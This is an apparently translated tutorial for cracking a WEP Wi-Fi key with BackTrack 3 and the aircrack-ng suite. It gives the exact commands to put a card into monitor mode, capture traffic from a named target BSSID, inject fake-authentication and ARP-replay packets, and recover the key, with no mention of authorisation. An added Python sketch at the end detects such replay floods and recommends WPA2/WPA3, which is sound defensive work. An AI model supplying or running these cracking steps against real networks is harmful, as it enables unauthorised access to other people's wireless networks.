1. Create the bootable USB flash drive: Decompress the downloaded BackTrack 3 (BT3) USB version (the bt3b141207.rar file at the end of the article) to a USB flash drive larger than 1 GB. Put the BOOT and BT3 folders in the root directory of the USB flash drive, then open the BOOT folder and double-click the "bootinst.bat" batch file to run it. Four more files will then appear on the USB flash drive: "isolinux.boot", "isolinux.cfg", "isolinux.bin" and "syslinux.cfg". (If you want the BT3 menus in Chinese, download the BT3 Chinese Language Pack, decompress the "Chinese" package inside the archive, and copy the *.lzm file to the BT3\modules directory of the USB flash drive to localize BT3.)
2. Restart Windows and enter the BIOS settings. Set the first boot device in the BIOS to USB-HDD (or USB-ZIP), then restart and boot from the USB drive. The system enters the BackTrack 3 system.
3. Start cracking now
1. Enter the ifconfig command in the shell window. The following information is displayed:
lo        no wireless extensions.
eth0      no wireless extensions.
eth1      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:(......)  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82
          Bit Rate:0 kb/s  Tx-Power:18 dBm  Sensitivity=0/3
          Retry:off  RTS thr:off  Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0  Missed beacon:0
2. Find the name of your wireless network card. Here mine is eth1. Then put the card into Monitor mode (enter airmon-ng start eth1 11). Enter the ifconfig command again and the following information is returned:
lo        no wireless extensions.
eth0      no wireless extensions.
eth1      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82
          Bit Rate:0 kb/s  Tx-Power:18 dBm  Sensitivity=0/3
          Retry:off  RTS thr:off  Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0  Missed beacon:0
3. Enter the command airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
In the command, "11" is the channel number of the target, "bssid" is the MAC (physical) address of the target, and "outputs" is the name of the capture file to be generated. Press Enter to run it.
4. Open another shell and enter aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1.
"targetnet" is the name of the target network, 00:1A:01:8D:C3:B2 is the MAC address of the target, and 00:A1:C1:D8:A5:B6 is the MAC address of the local NIC.
5. Open another shell and enter aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1.
This obtains more data packets.
6. When the amount of captured data reaches 10 thousand, cracking can begin. Open another shell and enter aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap to run the crack. If it fails, keep capturing packets and try again until the key is recovered.
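
Seen from the access point's side, steps 4 to 6 mean one station associates and then sends a sustained burst of same-length frames until about ten thousand data packets exist. The Python sketch below is an added example, not part of the original article, that flags that pattern in frame metadata; the record layout, window, threshold, client MAC and frame lengths are constructed assumptions.

```python
from collections import defaultdict, deque

WINDOW_S = 1.0      # assumed sliding window, in seconds
MAX_REPEATS = 100   # assumed limit of same-length frames per station per window


def find_replay_floods(frames, window=WINDOW_S, limit=MAX_REPEATS):
    """Flag stations that repeat one frame length at an abnormal rate.

    frames: time-ordered iterable of (timestamp, src_mac, bssid, length).
    Returns {(src_mac, bssid, length): timestamp when the limit was first exceeded}.
    """
    recent = defaultdict(deque)   # timestamps still inside the window, per key
    alerts = {}
    for ts, src, bssid, length in frames:
        key = (src.upper(), bssid.upper(), length)
        stamps = recent[key]
        stamps.append(ts)
        # Drop timestamps that have fallen out of the sliding window.
        while stamps and ts - stamps[0] > window:
            stamps.popleft()
        if len(stamps) > limit and key not in alerts:
            alerts[key] = ts
    return alerts


def build_sample():
    """Constructed sample traffic, not a real capture."""
    ap = "00:1A:01:8D:C3:B2"   # target BSSID used in the article's commands
    frames = []
    # Ordinary client: about 20 frames/s for 3 s, every frame a different length.
    for i in range(60):
        frames.append((i * 0.05, "00:11:22:33:44:55", ap, 80 + (i * 37) % 1200))
    # Replaying station: 500 identical-length frames/s for 2 s, starting at t=1.0.
    for i in range(1000):
        frames.append((1.0 + i * 0.002, "00:a1:c1:d8:a5:b6", ap, 68))
    return sorted(frames)


if __name__ == "__main__":
    for (src, bssid, length), ts in find_replay_floods(build_sample()).items():
        print(f"t={ts:.3f}s {src} -> {bssid}: >{MAX_REPEATS} frames of {length} bytes in {WINDOW_S}s")
```

On networks that still run WEP, an alert like this is a signal to migrate to WPA2 or WPA3; rate thresholds need tuning against normal traffic on the monitored channel.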